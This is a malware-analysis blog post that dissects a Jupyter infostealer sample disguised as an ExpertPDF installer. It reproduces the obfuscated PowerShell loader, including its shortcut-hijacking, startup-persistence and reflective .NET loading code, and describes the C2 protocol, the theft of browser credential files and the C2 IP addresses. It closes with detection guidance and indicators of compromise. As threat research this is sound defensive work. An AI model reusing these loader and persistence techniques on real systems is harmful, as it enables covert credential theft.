When I hear the word “Jupyter”, I think about the massive planet “Jupiter” and “Jupyter Notebooks”, part of the modern-day threat hunter’ toolstack. However, researchers at cybersecurity company Morphisec recently disclosed details about a new player in the malware scene, identically titled: Jupyter.
Jupyter is an infostealer trojan that primarily attempts to collect and exfiltrate sensitive information from web browsers including Chrome, Chromium and Firefox. Commonly sold on underground hacking forums, infostealers continue to evolve in sophistication. Jupyter malware is embedded within a setup/installer and disguised as legitimate software. It even uses sensible file icons and file names to induce the victim into running the installer. However, apart from launching an installation wizard, it drops a PowerShell script that initiates a complex series of events and capabilities including classic in-memory .NET tradecraft, establishing persistence and C2 communication. The malware is evasive by nature and maintained a 0% detection rate on VirusTotal over the last 6 months.
In this blog post we will walk through the analysis of a Jupyter malware sample that I came across two weeks ago. A summarized overview of the malware’s behavior including its forensic telemetry (red: process execution, purple: .NET assembly load events, blue: file creation, green: network activity) is illustrated below.
Static Property Analysis
This particular specimen of Jupyter malware impersonates the PDF converter tool, “ExpertPDF” from software firm AvanQuest. The file is named Sample-Invitation-Letter-For-Event-Participation.exe
and uses a product icon that looks similar to the logo of Adobe Reader. Another element that stands out is its rather large file size (148MB).
By examining the static properties of the executable, we can identify whether the specimen is signed. With the help of disitool
, a Python script developed by Didier Stevens, we can extract and store the file’s binary signature. The OpenSSL command can be used to convert the DER encoded certificate into a readable text file format.
python3 disitool.py extract Sample-Invitation-Letter-For-Event-Participation.exe malware-sig.der
openssl pcks7 -inform malware-sig.der -print_certs -text -in malware-sig.der > malware-sig.txt
Next, we use peframe to inspect the various static attributes specified in the PE header. As indicated in the output of the tool; Inno Setup was used to generate the installer. Peframe also discovered a reference to the installer’s former file name: SetupLDR.exe
. Some of the other fields such as FileDescription and the subject information of the certificate also have unusual values.
Meta data found [9]
------------------------------------------------------------
LegalCopyright
FileVersion
CompanyName
Comments This installation was built with Inno Setup.
ProductName Annuversuary Tech Software Production
ProductVersion 17.43.11.4
FileDescription Annuversuary Tech Software Production Setup
OriginalFileName
Translation 0x0000 0x04b0
File name discovered [2]
------------------------------------------------------------
Executable ExpertPDF.exe
Executable SetupLdr.exe
disitool output
------------------------------------------------------------
Serial Number 11:39:db:b0:27:76:fa:0f:0c:0d:f3:0b
Issuer C=BE, O=GlobalSign nv-sa, CN=GlobalSign Extended Validation CodeSigning CA -
Not Before Sep 4 10:09:10 2020 GMT
Not After Sep 5 10:09:10 2021 GMT
Subject businessCategory=Private Organization/serialNumber=114231100 1744/
1.3.6.1.4.1.311.60.2.1.3=RU/1.3.6.1.4.1.311.60.2.1.2=Krasnodar Krai,
C=RU, ST=Krasnodar Krai, L=Krasnodar/street=ul Solnechnaya, 15/5, O=ITM LLC, CN=ITM LLC
Obfuscated PowerShell Script
Upon execution, the installer unpacks itself into the user’s temp folder and runs the legitimate ExpertPDF installer - Expert_PDF.exe
. The following installation wizard screen is displayed:
Shortly after, a PowerShell process is spawned in the background with the following command line arguments:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\admin\AppData\Local\Temp\f1e27915a7a85333ae47f3a40f835751.txt';$xk='ycmtKhauWTxMfEIvqADlBrHeCVRPzFJidwjQSpLZGkgNYUXOnbos';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
Replace the command separator (semicolon) with newlines to make the code more legible:
$p='C:\Users\admin\AppData\Local\Temp\f1e27915a7a85333ae47f3a40f835751.txt'
$xk='ycmtKhauWTxMfEIvqADlBrHeCVRPzFJidwjQSpLZGkgNYUXOnbos'
$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));
remove-item $p;
for($i=0;$i -lt $xb.count;){
for($j=0;$j -lt $xk.length;$j++){
$xb[$i]=$xb[$i] -bxor $xk[$j];
$i++;
if($i -ge $xb.count){
$j=$xk.length
}
}
}
$xb=[System.Text.Encoding]::UTF8.GetString($xb);
iex $xb;
The PowerShell command/script initially looks for a text file in the user’s AppData directory. It then stores the content of this file in variable $xb
, a XOR-key in variable $vk
and adds obfuscation layers through various data encoding schemes. On line 4, the Remove-Item
cmdlet removes the text file from the file system. By deleting the file, the malware authors probably attempted to complicate/disrupt the reverse engineering process and minimize the footprint on the target system. Ironically, the complex encoding sequence takes up a substantial amount of time, making it trivial to grab the text file before deletion. The text file, 185KB in size, is processed through the following encoding sequence: Base64 > byte array > UTF-8. Finally, the iex $xb
(shortened for Invoke Expression) command executes the UTF-8 based string as PowerShell code.
We will run the same PowerShell script again. However, this time we will omit the Remove-Item
cmdlet on line 4 and change the last line of code to $xb Out-File C:\Users\pierre\Desktop\Jupyter\xb.txt
. This way, we can save the content of $xb
into a separate file.
The exported text file comprises yet another obfuscated PowerShell script. You can find a copy of this script on my GitHub, here. Okay, this one looks even more intimidating, right? To make our life easier, we will break the code into seven pieces.
Code portion I: generates random text strings and creates directory
$a90d284151e49c9ef9314f790a7e0=0
$a6a7167eb754a9ae9b0daa37b9060=[mAth]::RouND((GEt-dATe).TofiLetime() / 40000)
$a40a3a3c482402bda72b0583cdc58=""
$aafe563b6694dcb0874870326fdad=""
$a54a30d5d1b4a4b6eacff52a2a8ca=""
WhILe(([mATh]::ROuNd((GET-dAtE).toFIlETimE() / 10000)-$a6a7167eb754a9ae9b0daa37b9060 -lT 40000)-oR($a90d284151e49c9ef9314f790a7e0 -eQ 0)){
$a40a3a3c482402bda72b0583cdc58=-jOin ((65..90)+(97..122)|geT-randOM -count 76|%{[ChaR]$_})
$aafe563b6694dcb0874870326fdad=-Join ((65..90)+(97..122)|get-rAnDOM -coUNT 4|%{[cHaR]$_})
$a54a30d5d1b4a4b6eacff52a2a8ca=-Join ((65..90)+(97..122)|geT-RaNDom -coUnt 8|%{[cHAR]$_})
sTaRt-sLeEp -mILlISEcoNdS 10
$a90d284151e49c9ef9314f790a7e0=$a90d284151e49c9ef9314f790a7e0+1
}
$a9c46b5e38445f9fc4a990bbf287d="$EnV:apPDaTa\MICRosOfT\"+$aafe563b6694dcb0874870326fdad
nEw-Item -ItemtYpe DIRecToRy -FoRce -path $a9c46b5e38445f9fc4a990bbf287d
Returns letters according to its ASCII coded numerical value 65-90 (A-Z) and 97-122 (a-z). It assigns three randomized text strings, derived from the current date and time to individual variables. Each string varies in length: 76, 4 and 8 characters, respectively.
The last line of code creates a directory in the user’s AppData\Roaming\Microsoft
folder. The folder name is based on the generated text string of 4 characters. Example of the folder created in my sandbox: C:\Users\pierre\AppData\Roaming\Microsoft\xolW
.
Code portion II: processes Base64 blob
$a3c1f82ccd14a282b714d6a2f793e=$a9c46b5e38445f9fc4a990bbf287d+'\'+$a40a3a3c482402bda72b0583cdc58
$a7d6af859e24caa0d3c82e326c90b=$a9c46b5e38445f9fc4a990bbf287d+'\'+$a54a30d5d1b4a4b6eacff52a2a8ca
$abe0faa1f2c432afebeb0a15eb727=[sySTEm.CoNVERT]::FrOMbaSe64STRInG($acd48ffe17a452b4954a796b45146)
$abe0faa1f2c432afebeb0a15eb727|SEt-CONTENT $a3c1f82ccd14a282b714d6a2f793e -eNCodINg byTE
Line 1-2: Declares a new variable which holds the value of the folder path that has just been created. Appends a text string of 76/8 randomized characters to the path, which is going to represent a filename.
Line 3-4: Reads in the Base64 blob on top of the script and converts it to a byte array. Finally, the byte array is written to a file on disk. The file’s location consists of two parts: the recently created folder and the 76-character file name. Example of the file created in my sandbox: C:\Users\pierre\AppData\Roaming\Microsoft\xolW\eXHLdSnByszphulCNKrDAoTvxJkGMaVQPtfEZUqmjwRWObFcgIYi
.
Code portion III: suspicious cmd script
$a2ab4e6fb1848897c1b174e7c2cdc=NeW-oBJEcT -ComOBjEct wScRIPt.shEll
$a67eee407604a89ba2a431298f41f='@"%APPDAtA%\mICrOsoft\'+$aafe563b6694dcb0874870326fdad+'\'+$a54a30d5d1b4a4b6eacff52a2a8ca+'.CMd"'
Line 1: Creates a reference to the WScript.Shell COM object and stores it in a variable.
Line 2: Declares a new variable which holds the file path to a CMD file (batch script). The ‘cmd’ file extension is appended to the text string of 8 characters, assigned to variable $a54a30d5d1b4a4b6eacff52a2a8ca
, earlier. Example value of the variable in my sandbox: @"%APPDAtA%\mICrOsoft\xolW\LniOIybC.CMd"
.
Code portion IV: manipulates shortcut files
$a52ce24ea9c482b7251db482a9536=Get-cHILDIteM -pAth "$eNv:UsERprOfile\DEskToP\" -FiltEr '*.Lnk'|wHere-oBJeCT { $_.atTrIbuteS -ne "dirEcTOrY"}|SELEcT -eXpANDpROpeRTY FulLName
$a25f6f35cb04d0868defae7396fa7=Get-CHIldItEM -paTh "$eNv:usErprOfiLe\..\pUblIC\desktOP\" -fIlter '*.Lnk'|WheRe-ObJECt { $_.atTrIbutES -nE "dIRectory"}|sELECT -ExPAndProPerty FUlLNamE
$a52ce24ea9c482b7251db482a9536=$a52ce24ea9c482b7251db482a9536+$a25f6f35cb04d0868defae7396fa7
Foreach($a40b6e85954495b1875fcc0962d84 iN $a52ce24ea9c482b7251db482a9536){
TRy{ $a40b6e85954495b1875fcc0962d84=$a2ab4e6fb1848897c1b174e7c2cdc.crEATeSHOrtcut($a40b6e85954495b1875fcc0962d84)
$af94645bae548f8a708bf7aef9a9e=$a40b6e85954495b1875fcc0962d84.tArgetPAtH
$a1e5a6d32cb44085bac607aecc614=$af94645bae548f8a708bf7aef9a9e
iF(($af94645bae548f8a708bf7aef9a9e -lIkE '*CmD.ExE*') -OR (-Not ($af94645bae548f8a708bf7aef9a9e -like '*\*.*')) -oR (-NOt (TEsT-PATh $af94645bae548f8a708bf7aef9a9e)) -Or ($a40b6e85954495b1875fcc0962d84.ArguMEnTS.LenGTH -GT 0)){
$a40b6e85954495b1875fcc0962d84.save()
}elSE{
$a40b6e85954495b1875fcc0962d84.tArGeTPATh='CMd'
$a40b6e85954495b1875fcc0962d84.argUMenTS='/C @sTarT "" "'+$af94645bae548f8a708bf7aef9a9e+'" && '+$a67eee407604a89ba2a431298f41f
$a40b6e85954495b1875fcc0962d84.wiNDOWStYlE=7
$a40b6e85954495b1875fcc0962d84.iconlOCATION=$a1e5a6d32cb44085bac607aecc614
$a40b6e85954495b1875fcc0962d84.SaVe()
}
}
fINALly{}
}
Line 1-2: Enumerates all .LNK files (shortcuts) in the current/Public user Desktop folder. For each shortcut, it only extracts the FullName property which represents the full file path to the LNK file. For example: C:\Users\pierre\Desktop\Internet Explorer.lnk
.
Line 3: Merges the two lists of shortcuts and assign to a singular variable.
Now the remainder of the PowerShell code attempts to manipulate the target path of the collected shortcut files. The target path typically resembles the file path to a program’s executable. For example, a typical target path for Internet Explorer is: C:\Program Files (x86)\Internet Explorer\iexplore.exe
. For each shortcut, it modifies the target path by appending the file location of the CMD script. Going back to our example, this is what the new target path of Internet Explorer looks like after running the PowerShell code:
C:\WINDOWS\system32\CMd.exe /C @sTarT "" "C:\Program Files (x86)\Internet Explorer\iexplore.exe" && @"%APPDAtA%\mICrOsoft\xolW\LniOIybC.CMd"
.
Clandestine techniques are used to evade/subvert detection:
- The original file location of the executable is preserved in the target path. Although the program will start indirectly via cmd.exe, the shortcut will continue to work.
- The
WindowStyle
property is set to the value: ‘7’. This will minimize the console window upon execution of the CMD batch file.
Code portion V: creates persistence via startup folder
$a4fbc40b6ad435bb770e66ae2c559=("$"+"abab188938847d9e028b83169bd97=$"+"eNV:aPPdata+'\mIcROSOfT\WiNdoWS\stART MEnu\pRogrAMS\StaRTuP\add375f568547c9bc8c38d92878f1.LNK'
iF(-NoT(TEst-path $"+"abab188938847d9e028b83169bd97)){$"+"a1fe836cd2f4a584c8b26df3c899e=NEW-oBJect -cOmOBjECT wsCRipt.ShELL
$"+"a887c3fc4114a6ae35adcfe97686a=$"+"a1fe836cd2f4a584c8b26df3c899e.crEatEsHORtcuT($"+"abab188938847d9e028b83169bd97)
$"+"a887c3fc4114a6ae35adcfe97686a.WIndoWstYle=7
$"+"a887c3fc4114a6ae35adcfe97686a.TArGETPATh='"+$a7d6af859e24caa0d3c82e326c90b+".CMD'
$"+"a887c3fc4114a6ae35adcfe97686a.save()}
Declares a new variable which holds the location of a LNK file. It is saved in the current user’s startup directory under the hard coded name: add375f568547c9bc8c38d92878f1.LNK
and sets the file location of the CMD script as its target path.
The intention of this piece of code is to abuse a common persistence technique, by placing a shortcut that points to the suspicious CMD script, into the user’s compromised startup folder.
Code portion VI: loads self-contained assembly in memory
iF((GET-prOCEss -nAME '*PoWERShell*').count -lT 15){
$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk='
$afc49a7db894a1989bc60a8b4dcd7=[SySTem.io.fILe]::reaDallByteS([sYsTEm.tEXT.eNcODiNg]::utf8.gEtstRiNG([sYSTem.coNVERt]::FRoMbaSe64STrinG('QzpcVXNlcnNcUkVNXEFwcERhdGFcUm9hbWluZ1xNSUNSb3NPZlRccGtzVVxSemJtcGZRRmp2c2NoTUdUQkN3Vm5xZUxXSlBJU2dFWEROS3Jab0FIYXlrVXhPWWx1dGRp')))
write-host $a41841141c743b8d10df14c793537
For($a0bf2735f83489b6c01ebc52dd3ad=0; $a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count){
FOR($ad3c9c588084759dffa6395ab35e5=0; $ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length; $ad3c9c588084759dffa6395ab35e5++){
$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -BxOR $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5]; $a0bf2735f83489b6c01ebc52dd3ad++
if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){
$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length
}
}
}
[sySTEm.rEflEcTiON.AsSeMBLy]::lOad($afc49a7db894a1989bc60a8b4dcd7)
[D.M]::Run()
}
Applies multiple layers of obfuscation to the initial base64 string which finally ends up converted to a byte array. The last two lines in this code portion play a crucial role in the attack chain of the malware. Assembly.Load() of the System.Reflection namespace is the method that attempts to reflectively load a .NET assembly from a byte array directly into memory of the current process. The last line of code invokes the main method of the assembly: Run()
.
Code portion VII: stores PowerShell code in batch file
$a9787d755a5489be68be015546667='@CMD /c POWeRSheLl -w hIdDEn -CoMmaNd "'.ToLOwer()+$a4fbc40b6ad435bb770e66ae2c559+'"'
$a9787d755a5489be68be015546667|set-coNTEnT ($a7d6af859e24caa0d3c82e326c90b+".Cmd") -enCODInG oEm
Copies the PowerShell code portions V and VI into the CMD script. This ensures that the assembly will be loaded into memory when the user:
- Logs on to the system - through the shortcut in the user’s startup folder.
- Double-clicks a desktop shortcut - through the manipulated target path.
The content of the batch file is converted to OEM encoding, the format for MS-DOS and console programs.
Dumping the .NET assembly
As outlined in the previous section, the PowerShell script decodes an embedded resource and loads it as a .NET assembly in memory. We could use an arbitrary .NET unpacking tool to dump the assembly from the PowerShell process. However, it could exit prematurely or take advantage of other evasion/obfuscation techniques. Therefore, we opt for a managed debugging approach to dump the .NET assembly from memory. To accomplish this, we will use the Windows Debugger (WinDBG) tool, including the SOS extension.
In order to debug managed code we must first load the SOS debugging library into WinDBG:
0:000> .loadby sos clr
Next, we put a breakpoint on the Assembly.Load()
method. The !bpmd
command can set breakpoints on JIT compiled methods, including .NET Framework. It requires two arguments: the DLL in which the method is located (1) and the name of the method (2).
0:001> !bpmd mscorlib.dll System.Reflection.Assembly.Load
Found 8 methods in module 6da81000...
MethodDesc = 6db3fe60
MethodDesc = 6db3fe8c
MethodDesc = 6db3fe98
MethodDesc = 6db3fea4
MethodDesc = 6db3fec8
MethodDesc = 6db3fee0
MethodDesc = 6db3feec
MethodDesc = 6db3fef8
Setting breakpoint: bp 6E5D9B35 [System.Reflection.Assembly.Load(Byte[], Byte[], System.Security.Policy.Evidence)]
Setting breakpoint: bp 6E5D9A8B [System.Reflection.Assembly.Load(Byte[], Byte[], System.Security.SecurityContextSource)]
Setting breakpoint: bp 6E5D9A4F [System.Reflection.Assembly.Load(Byte[], Byte[])]
Setting breakpoint: bp 6E5D99E4 [System.Reflection.Assembly.Load(Byte[])]
Setting breakpoint: bp 6DE0F7B9 [System.Reflection.Assembly.Load(System.Reflection.AssemblyName, System.Security.Policy.Evidence)]
Setting breakpoint: bp 6DE39C49 [System.Reflection.Assembly.Load(System.Reflection.AssemblyName)]
Setting breakpoint: bp 6E5D9985 [System.Reflection.Assembly.Load(System.String, System.Security.Policy.Evidence)]
Setting breakpoint: bp 6DE89979 [System.Reflection.Assembly.Load(System.String)]
Adding pending breakpoints…
After setting the breakpoints, we will initialize CLR and allow execution of the PowerShell script by pressing ‘g’:
0:002> g
The .NET object parameter we are interested in is: Load(Byte[])
. The !CLRStack
command can list methods and its parameter(s). The output of this command shows the rawAssembly
parameter and the associated memory address:
0:003> !CLRStack -p
OS Thread Id: 0x1a1c (19)
Child SP IP Call Site
0982e554 6e5d99e4 System.Reflection.Assembly.Load(Byte[])
PARAMETERS:
rawAssembly (<CLR reg>) = 0x0631d528
The parameters passed to a .NET method are typically stored on the stack (ESP). However, this is only applicable for .NET version 4. As our assembly is compiled in .NET version 3.5, the arguments are stored in the ECX register instead.
The third DWORD value (00019000) in ECX represents the size of the byte array . The second DWORD value (6df31ab0) in ECX is a pointer to the byte array.
0:004> dd ecx
0631d528 6df31ab0 00019000 00905a4d 00000003
0631d538 00000004 0000ffff 000000b8 00000000
0631d548 00000040 00000000 00000000 00000000
0631d558 00000000 00000000 00000000 00000000
0631d568 00000000 00000080 0eba1f0e cd09b400
0631d578 4c01b821 685421cd 70207369 72676f72
0631d588 63206d61 6f6e6e61 65622074 6e757220
0631d598 206e6920 20534f44 65646f6d 0a0d0d2e
The db
command can dump a memory region in byte/ASCII format. In the output we can identify the PE header (hex: 4d 5a
), which indicates we are on the right track.
0:005> db ecx+8 L16
0631d530 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............
0631d540 b8 00 00 00 00 00
To show more details (size, content etc.) of the rawAssembly object, we can use the DumpObj
command:
0:006> !DumpObj /d 0x0631d528
Name: System.Byte[]
MethodTable: 6df31ab0
EEClass: 6db05cf8
Size: 102412(0x1900c) bytes
Array: Rank 1, Number of elements 102400, Type Byte (Print Array)
Content: MZ......................@....................................
...........!..L.!This program cannot be run in DOS mode....$.......
Fields:
Finally, based on the memory address and size of the object, we dump the .NET DLL assembly to disk:
0:007> .writemem C:\\users\pierre\Desktop\\Jupyter\\dump_pierre.dll 0x0631d528+8 L102412
Decompiling the .NET assembly
A .NET decompiler like dnSpy operates at a higher level and can reconstruct C# code, close to the original source code, with minimal effort. dnSpy is able to process the structure of the dumped .NET DLL assembly (original filename: 331be178-6e21-4292-a5e1-8175d61f5791.dll
) and display a hierarchy of namespaces, classes and methods:
The decompiled code does not appear to be obfuscated. In fact, the methods and classes have meaningful names and seem to reveal the intent of the code. Time to take a closer look!
‘LdrConfig’ class
The LdrConfig class contains public string objects that hold the hard-coded IP-address of the C2 server along with a XOR-key. Remember the reference to “SetupLDR.exe’’ that we’ve spotted during our static property analysis? LDR probably stands for “Loader” and the value “DR/1.6” presumably refers to the specific version of the malware.
‘GetHWID’ method
Uses the GenRandomString()
method to generate a randomized string of 32 characters and saves this value into solarmarker.dat
, a file in the user’s AppData folder. It serves as a unique identifier that the trojan will use for future C2 communication.
‘Req’ method
Declares the appropriate HTTP headers for sending HTTP POST requests and JSON-formatted payloads to the C2 server.
‘Run’ method
The main method of the assembly; it calls the remaining methods during the various phases of C2 communication.
DecryptRaw
,DecryptStr
,EncryptStr
,EncryptXor
: to encode and decode payloads.GetUserName
,GetWinVersion
,GetWorkGroup
,Is64x
,IsAdmin
: to gather system information and other details from the infected system.
C2 Communication
When I detonated the malware sample in my sandbox, the C2 infrastructure was still active. I managed to capture all of the network traffic between my sandbox and the C2 server. The different phases of C2 communication are illustrated below:
Initial call-back
During the initial callback, the victim sends a custom HTTP POST request to the (hardcoded) IP-address of the C2 server. The POST request, depicted below, contains an encoded JSON object in the body of the HTTP message.
The decoding algorithm, based on Base64 and XOR, can be found in the DecryptRaw
method of the assembly.
My tool of choice for decoding data is CyberChef. We can create a CyberChef recipe to decode the JSON payloads sent through the C2 channel. One of the “ingredients” is the hardcoded XOR key, declared in the LDRConfig class.
The decoded JSON-object specifies the ‘ping’ instruction. This callback message transmits the following information to the C2 server:
- The hwid that was generated through the ‘GetHWID’ method.
- System information: including the hostname, operating system and architecture.
- The privileges of the current user.
- The malware/loader version.
Assigns file task
We can use the same recipe to decode the corresponding payload in the HTTP response body. The C2 server assigns a unique task_id to its victim and refers to a PowerShell (ps1) file. The purpose of this instruction will make more sense when we analyze the next HTTP request/response pair.
{
"status": "file",
"type": "ps1",
"task_id": "4867a305-2830-11eb-9c2e-ac1f6bf6e446"
}
The C2 server most likely maintains a local database to keep track of infected systems, utilizing the hwid as a unique identifier. As soon as a new infected system checks-in, the C2 server will generate and assign a new task_id.
Download second-stage PowerShell script
Now this is the part where things get interesting. The decoded JSON-object in the next HTTP request triggers the “get_file” instruction. This will request a PowerShell script from the C2 server, based on the task_id.
{
"action": "get_file",
"hwid": "IFU057AMU0FJADRXKOFTSXEDRKOJ0WJI",
"task_id": "4867a305-2830-11eb-9c2e-ac1f6bf6e446",
"protocol_version": 1
}
The size of the self-contained PowerShell script in the body of the HTTP response message is 249096 bytes, indicated by the Content-Length header.
As reflected in the decompiled code, the second-stage PowerShell script is decoded and saved in the user’s temp directory. The GenRandomString
method assigns the script a random filename. The PowerShell one-liner shown below, spawns another child instance of powershell.exe
and executes the script.
In the third HTTP request, the infected system sends an acknowledgement, informing the C2 server that the implant has been successfully installed.
{
"action": "change_status",
"hwid": "IFU057AMU0FJADRXKOFTSXEDRKOJ0WJI",
"task_id": "4867a305-2830-11eb-9c2e-ac1f6bf6e446",
"is_success": true,
"protocol_version": 1
}
And finally, the C2 server assigns the ‘idle’ status to the infected system. It will now continue to beacon out at a continuous interval, waiting for the next instruction.
{
"status": "idle"
}
We can conclude that this .NET assembly serves as a RAT to drop arbitrary ps1 (or exe) files on the target system.
Analyzing the second-stage PowerShell script
In the previous section we’ve learned that the second-stage PowerShell script was dropped in the user’s temp directory. After viewing its content, it becomes clear that there’s a resemblance between this script and the one we’ve analyzed earlier. The same code structure, obfuscation layers, .NET execution technique and other patterns can be recognized. We can dump the self-contained .NET assembly in the body of the script by repeating the same steps as detailed above.
Like the two PowerShell scripts, there are also commonalities that exist in both .NET assemblies. There is an overlap in method definitions, for example: GenRandomString
and GetHWID
look familiar to us. Other methods like ReqGet
, ReqPOST
and ReqPOSTX
indicate active development of the malware’s call-home capability.
dnSpy shows that the root namespace of the .NET assembly is labeled jupyter
. The jupyter
method in this namespace contains two (constant) string objects:
addr
: URL with another IP-address that belongs to the C2 infrastructure.Stubversion
: the (updated) loader’s version.
Just under the ‘Jupyter’ namespace, we can see the classes; “chromium”, “firefox” and “hvnc”. These entities represent the heart of the infostealer technology, exposing its main capability: obtaining private data from popular web browsers including Google Chrome and Mozilla Firefox. Lets analyze the decompiled methods of the firefox
class.
‘steal_data’ method
If Firefox is installed on the victim’s system, it will iterate through each Firefox profile directory and verifies the existence of the following files:
key4.db
- the key used to encrypt the browser credentials stored inlogins.json
.formhistory.sqlite
– autocomplete items.cert9.db
- (custom) certificates/certificate revocation lists.cookies.sqlite
- cookie sessions.
In the code there’s a conditional statement that verifies whether ALL of these sensitive files exist on disk. This is allegedly implemented by the malware authors to focus on systems of interest or as an sandbox detection technique.
‘load_file’ method
If the Firefox process happens to be running on the victim’s system, it has applied a write-lock on the target files. No other process can activate a read or write lock until it is relinquished. Therefore, the five files are first copied to the user’s temp directory. It then assigns each file an 8-character file name. Before it deletes each file, the file’s content is read into a byte array in memory.
‘pack_data’ method
The pack_data
method converts each byte-array to a Base64 string. The encoded files are formatted as individual elements in a JSON object and exfiltrated over HTTP.
Data transfer to C2
Two items can be highlighted in the data exfiltration event, shown below:
- The length and value of URL query parameter
q
- The (empty) JSON array
data
The URL query string contains hex data. When decoded, we can see that it collects a variety of system information about the infected system. We’ve seen this behavior before, but in this instance a GET request is used to submit the data.
{
"hwid": "IFU057AMU0FJADRXKOFTSXEDRKOJ0WJI",
"pn": "DESKTOP-JGDDLLD",
"os": "Windows 10",
"x": "x86",
"prm": "User",
"ver": "CS-DN/1.8"
}
My sandbox was configured with a default installation/configuration of Firefox. Some of the files the trojan’s looking for (e.g. logins.json
) are not created by default. Therefore, during my analysis, the data
array did not contain any data.
Staging data
Another interesting aspect worth mentioning, is the malware’s capability to stage browser data in a custom folder, before triggering the exfiltration process. The prepare
method in the hvnc
class copies the Chrome UserData directory to a temporary location inside of the User’s temp folder named chrprf_bkp
.
It then validates whether the directory exists and sends a GET request that ends with the query parameter s
and value r
.
Apart from the 200 OK response, I personally did not observe any other form of interaction with the staged files.
Prevention and Hunting Use Cases
When we talk about detecting/preventing fileless threats such as assemblies being loaded in memory, we must think of techniques that go beyond monitoring for process creation events and suspicous command line arguments. For prevention, AMSI is integrated in .NET Framework version 4.8 and inspects and flags malicious Assembly.Load()
events. You can also monitor a particular set of ETW (Event Tracing for Windows) events related to assembly loading. ETW is a kernel-level event tracing mechanism, built-into Windows that handles the logging of all system events. ETW is historically used for performance monitoring and debugging applications, however it slowly adopting to become an essential data source for threat hunting. SilkETW, developed by Ruben Boonen is a C# wrapper that can filter and collect ETW events.
In this case we are interested in the ETW events from the Microsoft-Windows-DotNETRuntime
ETW provider. The sample below shows an event from SilkETW, after the RAT .NET DLL assembly was loaded in memory. SilkETW can also be configured to run as a service and the JSON-output can be consumed by a centralized logging platform such as the Elastic Stack.
{
"ProviderGuid": "e13c0d23-ccbc-4e12-931b-d9cc2eee27e4",
"ProviderName": "Microsoft-Windows-DotNETRuntime",
"EventName": "Loader/AssemblyLoad",
"OpcodeName": "AssemblyLoad",
"TimeStamp": "2020-11-23T12:43:01.9264932-05:00",
"ProcessID": 24924,
"ProcessName": "powershell",
...
"XmlEventData": {
"ProviderName": "Microsoft-Windows-DotNETRuntime",
"FullyQualifiedAssemblyName": "331be178-6e21-4292-a5e1-8175d61f5791,
Version=0.0.0.0, Culture=neutral, PublicKeyToken=null",
"EventName": "Loader/AssemblyLoad"
...
}
}
Other detection-patterns to hunt for:
- Suspicious PowerShell command line arguments such as
Base64
,-bxor
andSystem.Reflection
. - Startup entries being created by a suspicious process such as
powershell.exe
orcmd.exe
. - Suspicious activity in the User’s/Public
AppData
folder for example: creation of randomized folder/file names or execution of unsigned binaries. Establish a whitelist of legitimate files/folder and hunt for anomalies. - Endpoints communicating directly to an IP-address (no DNS-lookup) - review network flow logs.
- HTTP POST requests with no prior GET request or missing content-headers such as referer/cookie.
Indicators of Compromise
Type | Name | Value |
---|---|---|
File | Expert_PDF.exe | 0758e546302e5429f6662982f81e6afa9c28ee6666f1fecab44feb5f7f8aeb6f |
File | Sample-Invitation-Letter-For-Event-Participation.exe | 7d54089b2811a48f1bacd471cc1e7fdff344e81b5ce3cd02555f06a28ea79470 |
File | Sample-Invitation-Letter-For-Event-Participation.tmp | 3be8e9f9e76df60bc682887ea31813762e9d2c316260a702c3b3e54391a9111b |
File | 331be178-6e21-4292-a5e1-8175d61f5791.dll | 18a589c62cc5210faf0b036c4f9542e662afde9cf18d89898c35b856b4b35338 |
File | 02214bc8-7cce-4e8e-8bdf-299198e86000.dll | 243b7acb13df7f370d310892f58b9974380c9a073842cc308eb73d18d77401e3 |
Filename | %APPDATA%\Roaming\solarmarker.dat | N/A |
IP-address | C2 | 45[.]146.165.221 |
IP-address | C2 | 45[.]146.165.222 |
URL | C2 | http[:]//45[.]146.165.221 |
URL | C2 | http[:]//45[.]146.165.222/q/postv?q= |
MITRE ATT&CK
Technique ID | Technique | Technique details |
---|---|---|
T1082 | Discovery | System Information Discovery |
T1129 | Execution | Shared Modules |
T1106 | Execution | Native API |
T1059 | Execution | Command and Scripting Interpreter |
T1204 | Execution | User Execution |
T1547 | Persistence | Boot or Logon Autostart Execution |
T1003 | Credential Access | Credential Dumping |
T1071 | Command and Control | Application Layer Protocol |
T1041 | Exfiltration | Exfiltration Over C2 Channel |